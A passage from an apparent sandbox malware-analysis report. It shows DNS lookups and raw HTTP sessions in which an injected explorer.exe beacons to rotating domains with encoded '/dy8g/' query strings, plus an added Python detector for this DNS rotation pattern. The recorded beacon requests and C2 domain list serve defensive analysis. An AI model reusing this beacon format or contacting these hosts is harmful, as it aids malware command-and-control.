Jul 22, 2021 17:43:31.750777006 CEST | 192.168.2.6 | 8.8.8.8 | cfff | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:43:11.126398087 CEST | 192.168.2.6 | 8.8.8.8 | 0x1866 | Standard query (0) | www.aizaibali.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:14.429198027 CEST | 192.168.2.6 | 8.8.8.8 | 0xd048 | Standard query (0) | www.aizaibali.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:18.265986919 CEST | 192.168.2.6 | 8.8.8.8 | 0x82af | Standard query (0) | www.extinctionbrews.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:23.938721895 CEST | 192.168.2.6 | 8.8.8.8 | 0x64c8 | Standard query (0) | www.doityourselfism.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:29.505934000 CEST | 192.168.2.6 | 8.8.8.8 | 0xac29 | Standard query (0) | www.xn--vuq722jwngjre.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:30.544126987 CEST | 192.168.2.6 | 8.8.8.8 | 0xac29 | Standard query (0) | www.xn--vuq722jwngjre.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:31.544264078 CEST | 192.168.2.6 | 8.8.8.8 | 0xac29 | Standard query (0) | www.xn--vuq722jwngjre.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:36.693537951 CEST | 192.168.2.6 | 8.8.8.8 | 0xe600 | Standard query (0) | www.ecofingers.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:46.928169966 CEST | 192.168.2.6 | 8.8.8.8 | 0xef2d | Standard query (0) | www.invisiongc.net | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:52.184102058 CEST | 192.168.2.6 | 8.8.8.8 | 0x3cef | Standard query (0) | www.oikoschain.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:57.417082071 CEST | 192.168.2.6 | 8.8.8.8 | 0xfbfc | Standard query (0) | www.findfoodshop.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:03.409462929 CEST | 192.168.2.6 | 8.8.8.8 | 0xa966 | Standard query (0) | www.scuolatua.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:08.630681038 CEST | 192.168.2.6 | 8.8.8.8 | 0x71e5 | Standard query (0) | www.okinawarongnho.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:14.569951057 CEST | 192.168.2.6 | 8.8.8.8 | 0xf647 | Standard query (0) | www.jorgeporcayo.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:20.458342075 CEST | 192.168.2.6 | 8.8.8.8 | 0x9ea4 | Standard query (0) | www.wthcoffee.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:25.974387884 CEST | 192.168.2.6 | 8.8.8.8 | 0x669d | Standard query (0) | www.cwdelrio.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:43:11.337713003 CEST | 8.8.8.8 | 192.168.2.6 | 0x1866 | No error (0) | www.aizaibali.com | - | 154.88.31.204 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:14.637433052 CEST | 8.8.8.8 | 192.168.2.6 | 0xd048 | No error (0) | www.aizaibali.com | - | 154.88.31.204 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:18.327318907 CEST | 8.8.8.8 | 192.168.2.6 | 0x82af | No error (0) | www.extinctionbrews.com | extinctionbrews.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:43:18.327318907 CEST | 8.8.8.8 | 192.168.2.6 | 0x82af | No error (0) | extinctionbrews.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:24.086940050 CEST | 8.8.8.8 | 192.168.2.6 | 0x64c8 | No error (0) | www.doityourselfism.com | doityourselfism.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:43:24.086940050 CEST | 8.8.8.8 | 192.168.2.6 | 0x64c8 | No error (0) | doityourselfism.com | - | 169.62.77.158 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:31.679512024 CEST | 8.8.8.8 | 192.168.2.6 | 0xac29 | Server failure (2) | www.xn--vuq722jwngjre.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:31.749258995 CEST | 8.8.8.8 | 192.168.2.6 | 0xac29 | Server failure (2) | www.xn--vuq722jwngjre.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:32.341495037 CEST | 8.8.8.8 | 192.168.2.6 | 0xac29 | Server failure (2) | www.xn--vuq722jwngjre.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:36.758774996 CEST | 8.8.8.8 | 192.168.2.6 | 0xe600 | No error (0) | www.ecofingers.com | - | 52.58.78.16 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:46.989679098 CEST | 8.8.8.8 | 192.168.2.6 | 0xef2d | No error (0) | www.invisiongc.net | invisiongc.net | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:43:46.989679098 CEST | 8.8.8.8 | 192.168.2.6 | 0xef2d | No error (0) | invisiongc.net | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:52.401670933 CEST | 8.8.8.8 | 192.168.2.6 | 0x3cef | Name error (3) | www.oikoschain.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:43:57.807579994 CEST | 8.8.8.8 | 192.168.2.6 | 0xfbfc | No error (0) | www.findfoodshop.com | - | 119.59.120.26 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:03.471841097 CEST | 8.8.8.8 | 192.168.2.6 | 0xa966 | No error (0) | www.scuolatua.com | - | 62.149.128.40 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:08.993699074 CEST | 8.8.8.8 | 192.168.2.6 | 0x71e5 | No error (0) | www.okinawarongnho.com | okinawarongnho.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:44:08.993699074 CEST | 8.8.8.8 | 192.168.2.6 | 0x71e5 | No error (0) | okinawarongnho.com | - | 103.138.88.11 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:14.755909920 CEST | 8.8.8.8 | 192.168.2.6 | 0xf647 | No error (0) | www.jorgeporcayo.com | jorgeporcayo.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:44:14.755909920 CEST | 8.8.8.8 | 192.168.2.6 | 0xf647 | No error (0) | jorgeporcayo.com | - | 162.241.62.54 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:20.523808956 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ea4 | No error (0) | www.wthcoffee.com | wthcoffee.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:44:20.523808956 CEST | 8.8.8.8 | 192.168.2.6 | 0x9ea4 | No error (0) | wthcoffee.com | - | 184.168.131.241 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:44:26.063608885 CEST | 8.8.8.8 | 192.168.2.6 | 0x669d | Name error (3) | www.cwdelrio.com | none | none | A (IP address) | IN (0x0001)
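The DNS tables above show the injected explorer.exe resolving a new domain roughly every five to six seconds, retrying one name that returns SERVFAIL, getting NXDOMAIN for two others, and landing two different names on the same address (34.102.136.180). That cadence is visible in a resolver log long before any HTTP is seen. The following detector is an added example written for this report, not part of Joe Sandbox or the sample; the rows in DNS_LOG are copied from the tables above with timestamps truncated to milliseconds, and the thresholds (eight or more distinct names, 30% jitter around the median gap, 60% of gaps regular) are this example's own assumptions. It collapses retransmits so a retried query does not look like a fast beacon, then reports cadence, outcomes and shared addresses.

```python
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

# One row per DNS transaction in the report's DNS Queries / DNS Answers tables
# (timestamps truncated to milliseconds). Reply is the answered A record,
# "NXDOMAIN" (Name error) or "SERVFAIL" (Server failure). The three SERVFAIL rows
# are one query retransmitted three times, exactly as the report lists it.
DNS_LOG = [
    ("17:43:11.126", "www.aizaibali.com", "154.88.31.204"),
    ("17:43:14.429", "www.aizaibali.com", "154.88.31.204"),
    ("17:43:18.266", "www.extinctionbrews.com", "34.102.136.180"),
    ("17:43:23.939", "www.doityourselfism.com", "169.62.77.158"),
    ("17:43:29.506", "www.xn--vuq722jwngjre.com", "SERVFAIL"),
    ("17:43:30.544", "www.xn--vuq722jwngjre.com", "SERVFAIL"),
    ("17:43:31.544", "www.xn--vuq722jwngjre.com", "SERVFAIL"),
    ("17:43:36.694", "www.ecofingers.com", "52.58.78.16"),
    ("17:43:46.928", "www.invisiongc.net", "34.102.136.180"),
    ("17:43:52.184", "www.oikoschain.com", "NXDOMAIN"),
    ("17:43:57.417", "www.findfoodshop.com", "119.59.120.26"),
    ("17:44:03.409", "www.scuolatua.com", "62.149.128.40"),
    ("17:44:08.631", "www.okinawarongnho.com", "103.138.88.11"),
    ("17:44:14.570", "www.jorgeporcayo.com", "162.241.62.54"),
    ("17:44:20.458", "www.wthcoffee.com", "184.168.131.241"),
    ("17:44:25.974", "www.cwdelrio.com", "NXDOMAIN"),
]


def _ts(text):
    return datetime.strptime(text, "%H:%M:%S.%f")


def analyze_client(log, min_domains=8, jitter=0.30, min_regular=0.6):
    """Rotation statistics for one client's DNS log, plus whether it trips the rule.

    Thresholds are this example's assumptions; tune them against your own baseline.
    """
    # Collapse retries: a run of identical names counts once, at its first timestamp,
    # so the three retransmits of the SERVFAIL name do not masquerade as a 1 s beacon.
    firsts = []
    for text, name, _reply in log:
        if not firsts or firsts[-1][1] != name:
            firsts.append((_ts(text), name))

    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(firsts, firsts[1:])]
    med = median(gaps) if gaps else 0.0
    regular = [g for g in gaps if med and abs(g - med) <= jitter * med]
    regular_fraction = len(regular) / len(gaps) if gaps else 0.0

    # Final outcome per distinct name, and which resolved names share an address.
    last_reply = {name: reply for _t, name, reply in log}
    outcomes = Counter("resolved" if r[0].isdigit() else r for r in last_reply.values())
    ip_to_names = defaultdict(set)
    for name, reply in last_reply.items():
        if reply[0].isdigit():
            ip_to_names[reply].add(name)
    shared_ips = {ip: sorted(n) for ip, n in ip_to_names.items() if len(n) > 1}

    return {
        "distinct_domains": len(firsts),
        "median_gap_s": med,
        "regular_fraction": regular_fraction,
        "outcomes": dict(outcomes),
        "shared_ips": shared_ips,
        "flagged": len(firsts) >= min_domains and regular_fraction >= min_regular,
    }


if __name__ == "__main__":
    result = analyze_client(DNS_LOG)
    for key, value in result.items():
        print(f"{key}: {value}")
```

On a real resolver log, group rows by client IP first and run analyze_client per client; a host that resolves a dozen unrelated names at a steady gap, with a mix of NXDOMAIN and parked addresses among them, is worth pulling the HTTP side for, which is exactly what the next sections of this report show.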

HTTP Request Dependency Graph

• www.extinctionbrews.com
• www.doityourselfism.com
• www.ecofingers.com
• www.invisiongc.net
• www.findfoodshop.com
• www.scuolatua.com
• www.okinawarongnho.com
• www.jorgeporcayo.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49748 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:43:18.792526960 CEST | 4239 | OUT | GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1
Host: www.extinctionbrews.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:43:18.931600094 CEST | 4240 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 22 Jul 2021 15:43:18 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ef6789-113"
Via: 1.1 google
Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49752 | 169.62.77.158 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:43:24.283298969 CEST | 7468 | OUT | GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1
Host: www.doityourselfism.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
                                                                  Jul 22, 2021 17:43:24.475476027 CEST7469INHTTP/1.1 302 Found
                                                                  Date: Thu, 22 Jul 2021 15:43:24 GMT
                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                  Location: http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx
                                                                  Content-Length: 314
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 64 6f 69 74 79 6f 75 72 73 65 6c 66 69 73 6d 2e 63 6f 6d 2f 3f 69 30 47 44 4d 3d 59 34 4a 42 66 42 6a 42 4b 4d 47 7a 62 55 7a 72 4e 75 2b 41 52 4c 4b 34 5a 51 61 62 2b 64 61 70 31 6b 71 34 30 59 53 76 71 53 7a 79 4a 2f 6d 66 52 67 34 55 39 2b 4c 7a 31 65 4b 4a 66 52 4c 4b 33 63 41 6d 61 61 30 62 6b 77 3d 3d 26 61 6d 70 3b 30 58 3d 43 36 41 68 33 76 50 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session ID:2
                                                                  Source IP:192.168.2.6
                                                                  Source Port:49753
                                                                  Destination IP:52.58.78.16
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Jul 22, 2021 17:43:36.803443909 CEST
                                                                  kBytes transferred:10370
                                                                  Direction:OUT
                                                                  Data:GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.ecofingers.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Jul 22, 2021 17:43:36.847250938 CEST
                                                                  kBytes transferred:10370
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 410 Gone
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:41:50 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 6f 66 69 6e 67 65 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 6f 66 69 6e 67 65 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.ecofingers.com/' />a </head>9 <body>3a You are being redirected to http://www.ecofingers.coma </body>8</html>0


                                                                  Session ID:3
                                                                  Source IP:192.168.2.6
                                                                  Source Port:49758
                                                                  Destination IP:34.102.136.180
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Jul 22, 2021 17:43:47.034261942 CEST
                                                                  kBytes transferred:10389
                                                                  Direction:OUT
                                                                  Data:GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.invisiongc.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Jul 22, 2021 17:43:47.172086954 CEST
                                                                  kBytes transferred:10390
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60f790d8-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session ID:4
                                                                  Source IP:192.168.2.6
                                                                  Source Port:49760
                                                                  Destination IP:119.59.120.26
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Jul 22, 2021 17:43:58.054111004 CEST
                                                                  kBytes transferred:10418
                                                                  Direction:OUT
                                                                  Data:GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.findfoodshop.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Jul 22, 2021 17:43:58.298029900 CEST
                                                                  kBytes transferred:10419
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 22 Jul 2021 15:43:58 GMT
                                                                  Server: Apache/2
                                                                  Location: https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx
                                                                  Content-Length: 341
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 69 6e 64 66 6f 6f 64 73 68 6f 70 2e 63 6f 6d 2f 64 79 38 67 2f 3f 69 30 47 44 4d 3d 34 77 7a 61 45 43 79 34 47 42 54 75 51 6e 49 54 62 4e 4c 70 75 37 41 4f 51 62 79 71 49 59 72 7a 4a 41 73 4a 4e 67 47 42 32 64 54 52 39 39 55 51 77 4a 64 74 2b 46 70 46 6b 4f 61 77 45 66 45 56 64 4f 6c 59 6f 58 41 76 6f 41 3d 3d 26 61 6d 70 3b 30 58 3d 43 36 41 68 33 76 50 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session ID:5
                                                                  Source IP:192.168.2.6
                                                                  Source Port:49761
                                                                  Destination IP:62.149.128.40
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Jul 22, 2021 17:44:03.542511940 CEST
                                                                  kBytes transferred:10420
                                                                  Direction:OUT
                                                                  Data:GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.scuolatua.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Jul 22, 2021 17:44:03.612077951 CEST
                                                                  kBytes transferred:10421
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/8.5
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Thu, 22 Jul 2021 15:44:03 GMT
                                                                  Connection: close
                                                                  Content-Length: 5045
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 
